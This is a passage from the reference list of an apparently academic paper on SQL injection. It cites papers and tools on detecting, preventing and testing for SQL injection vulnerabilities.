Internet (SAINT), Seoul, Korea, 2010, pp. 31-37. [1 8] Dr.Manju Kaushik,Gazal Ojha,” SQL Injection Attack Detection and Prevention Methods: A Critical Review,” International Journal of Innovative Research in Science, Engineering and Technology [1 9] A. Ciampa, C. A. Visaggio and M. D. Penta, “A heuristic-based approach for detecting sql-injection vulnerabilities in web applications,” in In Proceedings of the 2010 ICSE Workshop on Software Engineering for Secure Systems, SESS ‟10, New York, NY, USA, 2010. [2 0] D. A. Anup Shakya, “A Taxonomy of SQL Injection Defense Techniques,” Karlskrona Sweden, 2011. [2 1] C. T. M and B. J., “Design considerations for a honeypot for sql injection attacks,” in LCN‟09, 2009. [2 2] M. Cova, D. Balzarotti, V. Felmetsger and G. Vigna, “Swaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications,” 12 December 2013. [Online]. Available: http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.127.6909. [2 3] S. Gordeychik, 15 December 2013. [Online]. [Accessed December 2013]. [2 4] A. Kieyzun, P. J. Guo and K. Jayaraman, “Ernst. Automatic creation of sql injection and cross-site scripting attacks,” in 31st International Conference on Software Engineering, ICSE ‟09,, Washington, 2009.

[2 5] ITNA / Integrated logic monitoring of the operating system, one of the requirements of the IT department of the organization [2 6] B. Damele A. G. and . S. Miroslav, “http://sqlmap.org/,” 12 June 2016. [Online]. Available: http://sqlmap.org/. [Accessed 13 June 2017]. [2 7] J. N., C. Kruegel and E. K. , “Pixy: a static analysis tool for detecting Web application vulnerabilities,” Security and Privacy, 2006 IEEE

Symposium on, pp. 41-46, 2006.